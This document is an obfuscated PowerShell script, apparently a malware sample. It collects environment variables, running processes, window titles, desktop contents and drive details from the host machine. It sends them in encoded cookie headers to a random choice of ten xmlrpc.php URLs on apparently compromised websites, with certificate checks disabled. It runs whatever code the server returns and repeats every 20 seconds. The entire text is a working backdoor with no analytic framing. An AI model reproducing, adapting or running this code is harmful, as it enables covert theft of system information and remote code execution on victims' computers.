230328-phex3ace8y.ps1

> function bvPt($izaGj){$jkRfn="A1BD9B2F1F";function bZvCqi($tPPcAU){$NYvIC = [System.IO.MemoryStream]::new();$Bcvg = [System.IO.StreamWriter]::new((New-Object System.IO.Compression.GZipStream($NYvIC,[System.IO.Compression.CompressionMode]::Compress)));$Bcvg.Write([String]::Join("|!",$tPPcAU));$Bcvg.Close();[System.Convert]::ToBase64String($NYvIC.ToArray())}$dsECLF = bZvCqi((dir env:|where{$_.value.Length -lt 100}|%{($_.name+"^"+$_.value)})+("OSWMI^"+(Get-WmiObject Win32_OperatingSystem).caption));$jLSa = bZvCqi(gps|select name -unique|%{$_.name});$LyyNmlK = bZvCqi(gps|where{$_.mainwindowtitle}|%{$_.name+"^"+$_.mainwindowtitle});$kxMrw = bZvCqi(((new-object -com shell.application).Namespace(0)).Items()|%{if($_.IsLink){"0"+$_.Name}elseif($_.IsFolder){"1"+$_.Name}elseif($_.IsFileSystem){"2"+[IO.Path]::GetFileName($_.Path)}else{"3"+$_.Name}});$gfZM = bZvCqi(gdr|where{$_.free -gt 50000}|%{$_.name+"^"+$_.used});[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::ServerCertificateValidationCallback ={$true};$ehXwvPri=[System.Net.WebRequest]::Create($izaGj);$ehXwvPri.UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36";$ehXwvPri.KeepAlive=0;$ehXwvPri.Headers.Add("Cookie: $jkRfn=$dsECLF; $jkRfn`1=$jLSa; $jkRfn`2=$LyyNmlK; $jkRfn`3=$kxMrw; $jkRfn`4=$gfZM");$ROsWvr=new-object System.IO.StreamReader $ehXwvPri.GetResponse().GetResponseStream();$aPvXWBj=($ROsWvr.ReadToEnd()) -split $jkRfn;if($aPvXWBj.Count -eq 3){iex($aPvXWBj[1] -replace "^","");}}while(1){try{bvPt(@("http://chiari.leganord.org/xmlrpc.php","https://wholisticresearch.com/xmlrpc.php","http://blog.tomorrowevening.com/xmlrpc.php","https://dictanty.ru/xmlrpc.php","https://neba.pl/xmlrpc.php","https://wagyupusher.dk/xmlrpc.php","https://test-drive.ir/xmlrpc.php","https://play-curio.com/xmlrpc.php","https://voltx.com.au/xmlrpc.php","https://mon-guide-voiture.fr/xmlrpc.php") | Get-Random)}catch{};sleep -s 20}